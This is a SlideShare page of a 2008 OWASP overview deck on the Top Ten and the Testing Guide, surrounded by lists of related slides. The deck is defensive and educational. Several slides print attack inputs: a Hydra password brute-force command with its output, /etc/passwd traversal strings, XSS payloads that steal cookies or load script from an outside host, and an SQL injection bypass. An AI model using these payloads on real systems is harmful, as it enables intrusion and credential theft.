Grupo Gesfor I+D+i, profile picture
Uploaded byGrupo Gesfor I+D+i
2,088 views

Romulus OWASP

This document provides an overview of the Open Web Application Security Project (OWASP). It discusses OWASP's mission to improve application security and lists some of its key projects, including the OWASP Top Ten, a list of the most critical web application security flaws. It also summarizes several common security testing techniques like information gathering, authentication testing, session management testing, and input validation testing. Tools are mentioned for each technique.

Embed presentation

Downloaded 37 times
OWASP OVERVIEW Alberto Pastor Nieto Informática Gesfor March 2008
OWASP The Open Web Application Security Project OWASP Top Ten OWASP Testing Guide (Tools demonstration)
OWASP The Open Web Application Security Project OWASP Top Ten OWASP Testing Guide (Tools demonstration)
OWASP Open community Interested in improving application security Not affiliated with any technology company
OWASP The Open Web Application Security Project OWASP Top Ten OWASP Testing Guide (Tools demonstration)
OWASP TOP TEN (2007) 1. Cross Site Scripting (XSS) 2. Injection Flaws 3. Malicious File Execution 4. Insecure Direct Object Reference 5. Cross Site Request Forgery (CSRF) 6. Information Leakage and Improper Error Handling 7. Broken Authentication and Session Management 8. Insecure Cryptographic Storage 9. Insecure Communications 10. Failure to Restrict URL Access
OWASP The Open Web Application Security Project OWASP Top Ten OWASP Testing Guide (Tools demonstration)
Information Gathering Testing Web Application Fingerprint Application Discovery Spidering and Googling SSL/TLS Testing Testing for File Extensions Handling Application Configuration Management Testing Old, Backup and Unreferenced Files
Information Gathering Testing Web Application Fingerprint Different servers Different responses Different versions
Information Gathering Testing Web Application Fingerprint $ nc 202.41.76.251 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Mon, 16 Jun 2003 02:53:29 GMT Server: Apache/1.3.3 (Unix) (Red Hat/Linux) Last-Modified: Wed, 07 Oct 1998 11:18:14 GMT ETag: "1813-49b-361b4df6" Accept-Ranges: bytes Content-Length: 1179 Connection: close Content-Type: text/html
Information Gathering Testing Web Application Fingerprint Tools: NETCRAFT ( http://www.netcraft.com ) httprint ( http://www.net-square.com/httprint/ )
Information Gathering Testing Web Application Fingerprint
Information Gathering Application Discovery Related issues: Different base URL Non-standard ports Virtual hosts
Information Gathering Application Discovery Different base URL: Directory exploration? Google (site:www.example.com) Candidate URLs (Ex. Nessus)
Information Gathering Application Discovery Non-standard ports: nmap –P0 –sT –sV –p1-65535 192.168.1.100 Interesting ports on 192.168.1.100: (The 65527 ports scanned but not shown below are in state: closed) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.5p1 (protocol 1.99) 80/tcp open http Apache httpd 2.0.40 ((Red Hat Linux)) 443/tcp open ssl OpenSSL 901/tcp open http Samba SWAT administration server
Information Gathering Application Discovery Virtual hosts: $ host -t ns www.owasp.org www.owasp.org is an alias for owasp.org. owasp.org name server ns1.secure.net. owasp.org name server ns2.secure.net. http://searchdns.netcraft.com/?host
Information Gathering Spidering and Googling Spidering: wget -r http://www.example.com Googling: googlegath.pl http://www.nothink.org/perl/googlegath/
Information Gathering SSL/TLS Testing Vulnerability Scanners: Expired certificates Weak Ciphers ... Other tools: OpenSSL, SSLDigger
Information Gathering Testing for File Extensions Handling Identify underlying technologies Tools: wget curl web mirroring tools vulnerability scanners
Information Gathering Application Configuration Management Testing Typical files and y directorios conocidos Be careful with HTML comments Personalize Error Pages Only load necessary modules Minimised privileges Access (correct and incorrect) log
Information Gathering Old, Backup and Unreferenced Files Site map and technology clues Content clues Practices: look into robots.txt, sitemaps files public information (cache: site:) search files: ~ .old .bak...
Information Gathering Old, Backup and Unreferenced Files No use: mod_autoindex y mod_info (Hide unnecessary information) Correctness permisions Use CHROOT Logs recommendations
Nessus http://www.nessus.org Port Scanner Vulnerability Scanner
Business Logic Testing Automated tools find it hard to understand context People who know logic business Strong data testing
Authentication Obtain User Accounts Dictionary attacks Bruteforce attacks Pattern searching attacks
Authentication Obtain User Accounts Tools: John the Ripper Hydra Brutus Rainbow Tables
Authentication Obtain User Accounts raven@blackbox /hydra $ ./hydra -L users.txt -P words.txt www.site.com https-post-form "/index.cgi:login&name=^USER^&password=^PASS^&login=Login:Not allowed" & Hydra v5.3 (c) 2006 by van Hauser / THC - use allowed only for legal purposes. Hydra (http://www.thc.org)starting at 2009-07-04 19:16:17 [DATA] 16 tasks, 1 servers, 1638 login tries (l:2/p:819), ~102 tries per task [DATA] attacking service http-post-form on port 443 [STATUS] attack finished for wiki.intranet (waiting for childs to finish) [443] host: 10.0.0.1 login: owasp password: password [STATUS] attack finished for www.site.com (waiting for childs to finish) Hydra (http://www.thc.org) finished at 2009-07-04 19:18:34
Authentication Bypassing authentication schema • Direct page request • Parameter modification • Session IDs Prediction • SQL Injection
Authentication Bypassing authentication schema Tools: WebScarab WebGoat (Trainning)
Authentication Directory traversal/file include Known as “dot-dot-slash” 2 evaluation steps: Input vectors enumeration Testing Techniques
Authentication Directory traversal/file include Input vectors enumeration: HTTP GET y POST requests File loading HTML forms ...
Authentication Directory traversal/file include Testing Techniques: http://example.com/getUserProfile.jsp?item=../../../../etc/passwd Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd http://example.com/index.php?file=http://www.owasp.org/malicioustxt CAREFUL WITH CHARSET!! %2e%2e%2f is ../ %2e%2e/ is ../ %2e%2e%5c is .. ..%2f is ../ %2e%2e is .. ..%5c is ..
Authentication Directory traversal/file include Tools: WebScarab Paros Burp Suite
Authentication Vulnerable remember password and pwd reset "Security questions": Multiple questions Strong questions Number of attempts CAPTCHA Sending to email
Authentication Vulnerable remember password and pwd reset Careful with “Remember password”: <INPUT TYPE="password" AUTOCOMPLETE="off"> If password is into a Cookie: In a hashed form
Session Management Logout and Browser Cache Management Testing End Web Session: • The user logs out • The user remains idle for a certain amount of time and the application automatically logs him/her out
Session Management Logout and Browser Cache Management Testing KEY: INVALIDATE SERVER-SIDE SESSION Java: HttpSession.invalidate()
Session Management Logout and Browser Cache Management Testing Other practices: End session button well visible Invalidate Cookies in client-side
Session Management Logout and Browser Cache Management Testing Tools: WebScarab Add N Edit Cookies (Firefox ext) Web Developer (Firefox ext)
Session Management Analysis of the Session Management Schema Session Tokens Analysis: Randomless Uniqueness Resistance to statistical analysis Resistance to cryptographic analysis
Session Management Cookie and Session Token Manipulation Steps: Cookie Collection Cookie Reverse Engineering Cookie manipulation
Session Management Cookie and Session Token Manipulation Tools: WebScarab Cookie Digger
Session Management Cross Site Request Forgery (CSRF) Cross-Site Request Forgery (CSRF) describes a way to force an unknowing user to execute unwanted actions on a web application in which he is currently authenticated. Recommended practices: Add session-related information in URLs Use POST Intermediate pages (“Are you sure you really want to do this?”) Use REFERER headers
Data Validation XSS (Cross Site Scripting) XSS: Code injection attacks into the various interpreters in the browser. http://server/cgi-bin/testcgi.exe? <SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT> <script src=http://www.example.com/malicious-code.js></script> %3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e x3cscript src=http://www.example.com/malicious-code.jsx3ex3c/scriptx3e Revise all input vectors
Data Validation XSS (Cross Site Scripting) Tools: OWASP CAL9000
Data Validation SQL Injection Insertion or "injection" of an SQL query via the input data from the client to the application. Example: SELECT * FROM Users WHERE Username='$username' AND Password='$password' Input: $username = 1' or '1' = '1 $password = 1' or '1' = '1 SELECT * FROM Users WHERE Username= '1' OR '1' = '1' AND Password= '1' OR '1' = '1'
Data Validation SQL Injection Tools: OWASP SQLIX SQL DUMPER
Data Validation Other Injections LDAP Injection (Lightweight Directory Access Protocol) ORM Injection (Hibernate in Java, Nhibernate in .NET, ActiveRecord in Ruby on Rails) XML Injection SSI Injection XPATH Injection IMAP/SMTP Injection System commands Injection
Data Validation Buffer overflow Issues caused by buffer overflows: Denial of service (DoS) Code Injection Code execution Practices: Update software Best practices
Denial of Service User accounts blocked (Use CAPTCHAs) Buffer overflows User specified object allocation User input as a loop counter User provide data to disk Failure to release resources Store too much data in Session
Web Services XML Structural Testing Overloading the XML parser XML Content-level Testing XML/SQL/XPath... Injections Validate Input Size Naugthy SOAP Attachments Testing Man-in-the-middle Testing
AJAX Testing Increased attack surface with many more inputs to secure Exposed internal functions of the application Client access to third-party resources with no built-in security and encoding mechanisms Failure to protect authentication information and sessions Blurred line between client-side and server-side code, resulting in security mistakes
Useful Tools OWASP Enterprise Security API OWASP Encoding (User Inputs validation) OWASP Stinger (HTTP request validation) OWASP CSRFTester Project
Any Question? OWASP http://www.owasp.org Romulus Project http://www.ict-romulus.org

More Related Content

PDF
Attack Chaining: Advanced Maneuvers for Hack Fu
byRob Ragan
 
PPT
Intro to Web Application Security
byRob Ragan
 
PPS
Hacking Client Side Insecurities
byamiable_indian
 
PDF
DEF CON 23 - BRENT - white hacking web apps wp
byFelipe Prado
 
PPTX
Application Security Tools
byLalit Kale
 
PPT
Web Hacking
byInformation Technology
 
PDF
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
bynyccamp
 
KEY
DVWA BruCON Workshop
bytestuser1223
 
Attack Chaining: Advanced Maneuvers for Hack Fu
byRob Ragan
 
Intro to Web Application Security
byRob Ragan
 
Hacking Client Side Insecurities
byamiable_indian
 
DEF CON 23 - BRENT - white hacking web apps wp
byFelipe Prado
 
Application Security Tools
byLalit Kale
 
Web Hacking
byInformation Technology
 
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
bynyccamp
 
DVWA BruCON Workshop
bytestuser1223
 

What's hot

PPTX
DVWA(Damn Vulnerabilities Web Application)
bySoham Kansodaria
 
PDF
Web Application Firewall: Suckseed or Succeed
byPrathan Phongthiproek
 
PPTX
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
bySoroush Dalili
 
PPTX
MITM Attacks on HTTPS: Another Perspective
byGreenD0g
 
PPT
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
byShreeraj Shah
 
PPTX
W3 conf hill-html5-security-realities
byBrad Hill
 
PPT
Hacking web applications
byAdeel Javaid
 
PPT
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
byZack Meyers
 
PPS
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
byClubHack
 
PPT
HTML5 hacking
byBlueinfy Solutions
 
PPTX
Hack ASP.NET website
byPositive Hack Days
 
PDF
Shreeraj-Hacking_Web_2
byguest66dc5f
 
PPTX
Cyber ppt
bykarthik menon
 
PDF
Rahul-Analysis_of_Adversarial_Code
byguest66dc5f
 
PDF
CSRF, ClickJacking & Open Redirect
byBlueinfy Solutions
 
PPTX
OWASP San Diego Training Presentation
byowaspsd
 
PDF
Html5 Application Security
bychuckbt
 
PPTX
Evolution Of The Web Platform & Browser Security
bySanjeev Verma, PhD
 
PDF
Neat tricks to bypass CSRF-protection
byMikhail Egorov
 
PPTX
Post XSS Exploitation : Advanced Attacks and Remedies
byAdwiteeya Agrawal
 
DVWA(Damn Vulnerabilities Web Application)
bySoham Kansodaria
 
Web Application Firewall: Suckseed or Succeed
byPrathan Phongthiproek
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
bySoroush Dalili
 
MITM Attacks on HTTPS: Another Perspective
byGreenD0g
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
byShreeraj Shah
 
W3 conf hill-html5-security-realities
byBrad Hill
 
Hacking web applications
byAdeel Javaid
 
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
byZack Meyers
 
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
byClubHack
 
HTML5 hacking
byBlueinfy Solutions
 
Hack ASP.NET website
byPositive Hack Days
 
Shreeraj-Hacking_Web_2
byguest66dc5f
 
Cyber ppt
bykarthik menon
 
Rahul-Analysis_of_Adversarial_Code
byguest66dc5f
 
CSRF, ClickJacking & Open Redirect
byBlueinfy Solutions
 
OWASP San Diego Training Presentation
byowaspsd
 
Html5 Application Security
bychuckbt
 
Evolution Of The Web Platform & Browser Security
bySanjeev Verma, PhD
 
Neat tricks to bypass CSRF-protection
byMikhail Egorov
 
Post XSS Exploitation : Advanced Attacks and Remedies
byAdwiteeya Agrawal
 

Similar to Romulus OWASP

PPTX
Web application vulnerability assessment
byRavikumar Paghdal
 
PPT
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
byJeremiah Grossman
 
PPTX
OTG-Recon
bySedthakit Prasanphanich
 
PDF
Web Security - Introduction v.1.3
byOles Seheda
 
PDF
Web Security - Introduction
bySQALab
 
PDF
Web hackingtools cf-summit2014
byColdFusionConference
 
PDF
Common Web Application Attacks
byAhmed Sherif
 
ODP
Introduction to OWASP & Web Application Security
byOWASPKerala
 
PDF
2011 and still bruteforcing - OWASP Spain
byChristian Martorella
 
PDF
Silent web app testing by example - BerlinSides 2011
byAbraham Aranguren
 
PDF
Web application security & Testing
byDeepu S Nath
 
PPTX
Attacking Web Applications
bySasha Goldshtein
 
PPT
Penetration Testing Basics
byRick Wanner
 
PDF
BruCon 2011 Lightning talk winner: Web app testing without attack traffic
byAbraham Aranguren
 
PPTX
Web Application Penetration Testing Introduction
bygbud7
 
PPTX
Hacking WebApps for fun and profit : how to approach a target?
byYassine Aboukir
 
PPTX
Application and Website Security -- Fundamental Edition
byDaniel Owens
 
PDF
TriplePlay-WebAppPenTestingTools
byYury Chemerkin
 
PPT
Starwest 2008
byCaleb Sima
 
PDF
Web Application Security: Introduction to common classes of security flaws an...
byThoughtworks
 
Web application vulnerability assessment
byRavikumar Paghdal
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
byJeremiah Grossman
 
OTG-Recon
bySedthakit Prasanphanich
 
Web Security - Introduction v.1.3
byOles Seheda
 
Web Security - Introduction
bySQALab
 
Web hackingtools cf-summit2014
byColdFusionConference
 
Common Web Application Attacks
byAhmed Sherif
 
Introduction to OWASP & Web Application Security
byOWASPKerala
 
2011 and still bruteforcing - OWASP Spain
byChristian Martorella
 
Silent web app testing by example - BerlinSides 2011
byAbraham Aranguren
 
Web application security & Testing
byDeepu S Nath
 
Attacking Web Applications
bySasha Goldshtein
 
Penetration Testing Basics
byRick Wanner
 
BruCon 2011 Lightning talk winner: Web app testing without attack traffic
byAbraham Aranguren
 
Web Application Penetration Testing Introduction
bygbud7
 
Hacking WebApps for fun and profit : how to approach a target?
byYassine Aboukir
 
Application and Website Security -- Fundamental Edition
byDaniel Owens
 
TriplePlay-WebAppPenTestingTools
byYury Chemerkin
 
Starwest 2008
byCaleb Sima
 
Web Application Security: Introduction to common classes of security flaws an...
byThoughtworks
 

More from Grupo Gesfor I+D+i

PDF
Propuesta demostrador Cardinea
byGrupo Gesfor I+D+i
 
PDF
THOFU- Gigaconectividad jornadas de presentación del cluster Habitat en Catal...
byGrupo Gesfor I+D+i
 
PDF
Triptico Redes Hibridas 2010
byGrupo Gesfor I+D+i
 
PPT
THOFU Presentacion General corta
byGrupo Gesfor I+D+i
 
PDF
Omelette Project Overview
byGrupo Gesfor I+D+i
 
ODP
Presentación contenidos a la carta en jornada lankibide
byGrupo Gesfor I+D+i
 
PPT
EduWAI: Disabilities & ict's 4 learning
byGrupo Gesfor I+D+i
 
PDF
Brochure Cisvi
byGrupo Gesfor I+D+i
 
ODP
Alta alumnos admiTI2
byGrupo Gesfor I+D+i
 
PDF
Presentación proyecto 3D Tour
byGrupo Gesfor I+D+i
 
PDF
Romulus Project start version en
byGrupo Gesfor I+D+i
 
PPT
InnovaEDU
byGrupo Gesfor I+D+i
 
PPT
eduWAI presentacion proyecto
byGrupo Gesfor I+D+i
 
PDF
Cantiga Tríptico
byGrupo Gesfor I+D+i
 
PDF
Conecta Tríptico
byGrupo Gesfor I+D+i
 
PDF
Museos2.0 Tríptico
byGrupo Gesfor I+D+i
 
PDF
Redes Híbridas Tríptico
byGrupo Gesfor I+D+i
 
PDF
3DTour Brochure
byGrupo Gesfor I+D+i
 
PDF
Cardea brochure
byGrupo Gesfor I+D+i
 
PDF
Contenidos a la Carta Brochure
byGrupo Gesfor I+D+i
 
Propuesta demostrador Cardinea
byGrupo Gesfor I+D+i
 
THOFU- Gigaconectividad jornadas de presentación del cluster Habitat en Catal...
byGrupo Gesfor I+D+i
 
Triptico Redes Hibridas 2010
byGrupo Gesfor I+D+i
 
THOFU Presentacion General corta
byGrupo Gesfor I+D+i
 
Omelette Project Overview
byGrupo Gesfor I+D+i
 
Presentación contenidos a la carta en jornada lankibide
byGrupo Gesfor I+D+i
 
EduWAI: Disabilities & ict's 4 learning
byGrupo Gesfor I+D+i
 
Brochure Cisvi
byGrupo Gesfor I+D+i
 
Alta alumnos admiTI2
byGrupo Gesfor I+D+i
 
Presentación proyecto 3D Tour
byGrupo Gesfor I+D+i
 
Romulus Project start version en
byGrupo Gesfor I+D+i
 
InnovaEDU
byGrupo Gesfor I+D+i
 
eduWAI presentacion proyecto
byGrupo Gesfor I+D+i
 
Cantiga Tríptico
byGrupo Gesfor I+D+i
 
Conecta Tríptico
byGrupo Gesfor I+D+i
 
Museos2.0 Tríptico
byGrupo Gesfor I+D+i
 
Redes Híbridas Tríptico
byGrupo Gesfor I+D+i
 
3DTour Brochure
byGrupo Gesfor I+D+i
 
Cardea brochure
byGrupo Gesfor I+D+i
 
Contenidos a la Carta Brochure
byGrupo Gesfor I+D+i
 

Recently uploaded

PDF
Effortless Distributed Systems with Aspire.pdf
byParticular Software
 
PDF
Chapter 5 Security Mechanisms iin computer security.pdf
byGetnet Tigabie Askale -(GM)
 
PPTX
PPTX game guess the logo with a twistppt
byAdrianAnig
 
PDF
Odoo Implementation Checklist: A Strategic ERP Blueprint for Business-Ready D...
byBANIBRO IT SOLUTION
 
PDF
How AI Can Help Platform Engineers Build Better Platforms
byAll Things Open
 
PDF
Session 1/5: Enhancing Automation with Screenplay & Business Rules
bysuhanisingh58689
 
PDF
Spec-Driven Development with Kiro: Elevating Software Quality, Traceability, ...
byHaim Michael
 
PDF
apidays Paris 2025 | Zero Trust By Design
byapidays
 
PDF
UiPath Automation Developer Associate Training Series 2025 - Session 4
byDianaGray10
 
PDF
GTM-and-Sales-Plan for a cyber security product
byAshish Jangir
 
PDF
GenerationAI_Paris_2025_Architecting_Intelligence.pdf
byapidays
 
PPTX
Do You Control the AI, or Does the AI Control You?
bymedhateltoukhy
 
PDF
February 2026 Patch Tuesday hosted by Chris Goettl and Todd Schell
byIvanti
 
PDF
NTG -Company Profile_Software_Vendor_Company_in_MENA
byMustafa Kuğu
 
PPTX
Introducing VisualSim 2610 The Next Leap in System Level Modeling
byDeepak Shankar
 
PDF
How does MES(Manufacturing Execution System) work?
byakipii ogaoga
 
PPTX
Celonis Optimizing your future with process
bydevjeremyappleyard
 
PPTX
apidays Paris 2025 | Building Agentic Workflows
byapidays
 
PPTX
Workflow and decision Automation with Flowable
bychakib ch
 
PPTX
Automation Without Apprentices: How AI Challenges the Open Source Way
byIcinga
 
Effortless Distributed Systems with Aspire.pdf
byParticular Software
 
Chapter 5 Security Mechanisms iin computer security.pdf
byGetnet Tigabie Askale -(GM)
 
PPTX game guess the logo with a twistppt
byAdrianAnig
 
Odoo Implementation Checklist: A Strategic ERP Blueprint for Business-Ready D...
byBANIBRO IT SOLUTION
 
How AI Can Help Platform Engineers Build Better Platforms
byAll Things Open
 
Session 1/5: Enhancing Automation with Screenplay & Business Rules
bysuhanisingh58689
 
Spec-Driven Development with Kiro: Elevating Software Quality, Traceability, ...
byHaim Michael
 
apidays Paris 2025 | Zero Trust By Design
byapidays
 
UiPath Automation Developer Associate Training Series 2025 - Session 4
byDianaGray10
 
GTM-and-Sales-Plan for a cyber security product
byAshish Jangir
 
GenerationAI_Paris_2025_Architecting_Intelligence.pdf
byapidays
 
Do You Control the AI, or Does the AI Control You?
bymedhateltoukhy
 
February 2026 Patch Tuesday hosted by Chris Goettl and Todd Schell
byIvanti
 
NTG -Company Profile_Software_Vendor_Company_in_MENA
byMustafa Kuğu
 
Introducing VisualSim 2610 The Next Leap in System Level Modeling
byDeepak Shankar
 
How does MES(Manufacturing Execution System) work?
byakipii ogaoga
 
Celonis Optimizing your future with process
bydevjeremyappleyard
 
apidays Paris 2025 | Building Agentic Workflows
byapidays
 
Workflow and decision Automation with Flowable
bychakib ch
 
Automation Without Apprentices: How AI Challenges the Open Source Way
byIcinga
 

Romulus OWASP

  • 1.
    OWASP OVERVIEW Alberto Pastor Nieto Informática Gesfor March 2008
  • 2.
    OWASP The Open WebApplication Security Project OWASP Top Ten OWASP Testing Guide (Tools demonstration)
  • 3.
    OWASP The Open WebApplication Security Project OWASP Top Ten OWASP Testing Guide (Tools demonstration)
  • 4.
    OWASP Open community Interested inimproving application security Not affiliated with any technology company
  • 5.
    OWASP The Open WebApplication Security Project OWASP Top Ten OWASP Testing Guide (Tools demonstration)
  • 6.
    OWASP TOP TEN (2007) 1. Cross Site Scripting (XSS) 2. Injection Flaws 3. Malicious File Execution 4. Insecure Direct Object Reference 5. Cross Site Request Forgery (CSRF) 6. Information Leakage and Improper Error Handling 7. Broken Authentication and Session Management 8. Insecure Cryptographic Storage 9. Insecure Communications 10. Failure to Restrict URL Access
  • 7.
    OWASP The Open WebApplication Security Project OWASP Top Ten OWASP Testing Guide (Tools demonstration)
  • 8.
    Information Gathering Testing WebApplication Fingerprint Application Discovery Spidering and Googling SSL/TLS Testing Testing for File Extensions Handling Application Configuration Management Testing Old, Backup and Unreferenced Files
  • 9.
    Information Gathering Testing Web Application Fingerprint Different servers Different responses Different versions
  • 10.
    Information Gathering Testing Web Application Fingerprint $ nc 202.41.76.251 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Mon, 16 Jun 2003 02:53:29 GMT Server: Apache/1.3.3 (Unix) (Red Hat/Linux) Last-Modified: Wed, 07 Oct 1998 11:18:14 GMT ETag: "1813-49b-361b4df6" Accept-Ranges: bytes Content-Length: 1179 Connection: close Content-Type: text/html
  • 11.
    Information Gathering Testing Web Application Fingerprint Tools: NETCRAFT ( http://www.netcraft.com ) httprint ( http://www.net-square.com/httprint/ )
  • 12.
    Information Gathering Testing Web Application Fingerprint
  • 13.
    Information Gathering Application Discovery Related issues: Different base URL Non-standard ports Virtual hosts
  • 14.
    Information Gathering Application Discovery Different base URL: Directory exploration? Google (site:www.example.com) Candidate URLs (Ex. Nessus)
  • 15.
    Information Gathering Application Discovery Non-standard ports: nmap –P0 –sT –sV –p1-65535 192.168.1.100 Interesting ports on 192.168.1.100: (The 65527 ports scanned but not shown below are in state: closed) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.5p1 (protocol 1.99) 80/tcp open http Apache httpd 2.0.40 ((Red Hat Linux)) 443/tcp open ssl OpenSSL 901/tcp open http Samba SWAT administration server
  • 16.
    Information Gathering Application Discovery Virtual hosts: $ host -t ns www.owasp.org www.owasp.org is an alias for owasp.org. owasp.org name server ns1.secure.net. owasp.org name server ns2.secure.net. http://searchdns.netcraft.com/?host
  • 17.
    Information Gathering Spidering and Googling Spidering: wget -r http://www.example.com Googling: googlegath.pl http://www.nothink.org/perl/googlegath/
  • 18.
    Information Gathering SSL/TLS Testing Vulnerability Scanners: Expired certificates Weak Ciphers ... Other tools: OpenSSL, SSLDigger
  • 19.
    Information Gathering Testing for File Extensions Handling Identify underlying technologies Tools: wget curl web mirroring tools vulnerability scanners
  • 20.
    Information Gathering Application Configuration Management Testing Typical files and y directorios conocidos Be careful with HTML comments Personalize Error Pages Only load necessary modules Minimised privileges Access (correct and incorrect) log
  • 21.
    Information Gathering Old, Backup and Unreferenced Files Site map and technology clues Content clues Practices: look into robots.txt, sitemaps files public information (cache: site:) search files: ~ .old .bak...
  • 22.
    Information Gathering Old, Backup and Unreferenced Files No use: mod_autoindex y mod_info (Hide unnecessary information) Correctness permisions Use CHROOT Logs recommendations
  • 23.
    Nessus http://www.nessus.org Port Scanner Vulnerability Scanner
  • 24.
    Business Logic Testing Automatedtools find it hard to understand context People who know logic business Strong data testing
  • 25.
    Authentication Obtain User Accounts Dictionary attacks Bruteforce attacks Pattern searching attacks
  • 26.
    Authentication Obtain User Accounts Tools: John the Ripper Hydra Brutus Rainbow Tables
  • 27.
    Authentication Obtain User Accounts raven@blackbox /hydra $ ./hydra -L users.txt -P words.txt www.site.com https-post-form "/index.cgi:login&name=^USER^&password=^PASS^&login=Login:Not allowed" & Hydra v5.3 (c) 2006 by van Hauser / THC - use allowed only for legal purposes. Hydra (http://www.thc.org)starting at 2009-07-04 19:16:17 [DATA] 16 tasks, 1 servers, 1638 login tries (l:2/p:819), ~102 tries per task [DATA] attacking service http-post-form on port 443 [STATUS] attack finished for wiki.intranet (waiting for childs to finish) [443] host: 10.0.0.1 login: owasp password: password [STATUS] attack finished for www.site.com (waiting for childs to finish) Hydra (http://www.thc.org) finished at 2009-07-04 19:18:34
  • 28.
    Authentication Bypassing authentication schema • Direct page request • Parameter modification • Session IDs Prediction • SQL Injection
  • 29.
    Authentication Bypassing authentication schema Tools: WebScarab WebGoat (Trainning)
  • 30.
    Authentication Directory traversal/file include Known as “dot-dot-slash” 2 evaluation steps: Input vectors enumeration Testing Techniques
  • 31.
    Authentication Directory traversal/file include Input vectors enumeration: HTTP GET y POST requests File loading HTML forms ...
  • 32.
    Authentication Directory traversal/file include Testing Techniques: http://example.com/getUserProfile.jsp?item=../../../../etc/passwd Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd http://example.com/index.php?file=http://www.owasp.org/malicioustxt CAREFUL WITH CHARSET!! %2e%2e%2f is ../ %2e%2e/ is ../ %2e%2e%5c is .. ..%2f is ../ %2e%2e is .. ..%5c is ..
  • 33.
    Authentication Directory traversal/file include Tools: WebScarab Paros Burp Suite
  • 34.
    Authentication Vulnerable remember password and pwd reset "Security questions": Multiple questions Strong questions Number of attempts CAPTCHA Sending to email
  • 35.
    Authentication Vulnerable remember password and pwd reset Careful with “Remember password”: <INPUT TYPE="password" AUTOCOMPLETE="off"> If password is into a Cookie: In a hashed form
  • 36.
    Session Management Logout and Browser Cache Management Testing End Web Session: • The user logs out • The user remains idle for a certain amount of time and the application automatically logs him/her out
  • 37.
    Session Management Logout and Browser Cache Management Testing KEY: INVALIDATE SERVER-SIDE SESSION Java: HttpSession.invalidate()
  • 38.
    Session Management Logout and Browser Cache Management Testing Other practices: End session button well visible Invalidate Cookies in client-side
  • 39.
    Session Management Logout and Browser Cache Management Testing Tools: WebScarab Add N Edit Cookies (Firefox ext) Web Developer (Firefox ext)
  • 40.
    Session Management Analysis of the Session Management Schema Session Tokens Analysis: Randomless Uniqueness Resistance to statistical analysis Resistance to cryptographic analysis
  • 41.
    Session Management Cookie and Session Token Manipulation Steps: Cookie Collection Cookie Reverse Engineering Cookie manipulation
  • 42.
    Session Management Cookie and Session Token Manipulation Tools: WebScarab Cookie Digger
  • 43.
    Session Management Cross Site Request Forgery (CSRF) Cross-Site Request Forgery (CSRF) describes a way to force an unknowing user to execute unwanted actions on a web application in which he is currently authenticated. Recommended practices: Add session-related information in URLs Use POST Intermediate pages (“Are you sure you really want to do this?”) Use REFERER headers
  • 44.
    Data Validation XSS (Cross Site Scripting) XSS: Code injection attacks into the various interpreters in the browser. http://server/cgi-bin/testcgi.exe? <SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT> <script src=http://www.example.com/malicious-code.js></script> %3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e x3cscript src=http://www.example.com/malicious-code.jsx3ex3c/scriptx3e Revise all input vectors
  • 45.
    Data Validation XSS (Cross Site Scripting) Tools: OWASP CAL9000
  • 46.
    Data Validation SQL Injection Insertion or "injection" of an SQL query via the input data from the client to the application. Example: SELECT * FROM Users WHERE Username='$username' AND Password='$password' Input: $username = 1' or '1' = '1 $password = 1' or '1' = '1 SELECT * FROM Users WHERE Username= '1' OR '1' = '1' AND Password= '1' OR '1' = '1'
  • 47.
    Data Validation SQL Injection Tools: OWASP SQLIX SQL DUMPER
  • 48.
    Data Validation Other Injections LDAP Injection (Lightweight Directory Access Protocol) ORM Injection (Hibernate in Java, Nhibernate in .NET, ActiveRecord in Ruby on Rails) XML Injection SSI Injection XPATH Injection IMAP/SMTP Injection System commands Injection
  • 49.
    Data Validation Buffer overflow Issues caused by buffer overflows: Denial of service (DoS) Code Injection Code execution Practices: Update software Best practices
  • 50.
    Denial of Service Useraccounts blocked (Use CAPTCHAs) Buffer overflows User specified object allocation User input as a loop counter User provide data to disk Failure to release resources Store too much data in Session
  • 51.
    Web Services XML Structural Testing Overloading the XML parser XML Content-level Testing XML/SQL/XPath... Injections Validate Input Size Naugthy SOAP Attachments Testing Man-in-the-middle Testing
  • 52.
    AJAX Testing Increased attacksurface with many more inputs to secure Exposed internal functions of the application Client access to third-party resources with no built-in security and encoding mechanisms Failure to protect authentication information and sessions Blurred line between client-side and server-side code, resulting in security mistakes
  • 53.
    Useful Tools OWASP EnterpriseSecurity API OWASP Encoding (User Inputs validation) OWASP Stinger (HTTP request validation) OWASP CSRFTester Project
  • 54.
    Any Question? OWASP http://www.owasp.org Romulus Project http://www.ict-romulus.org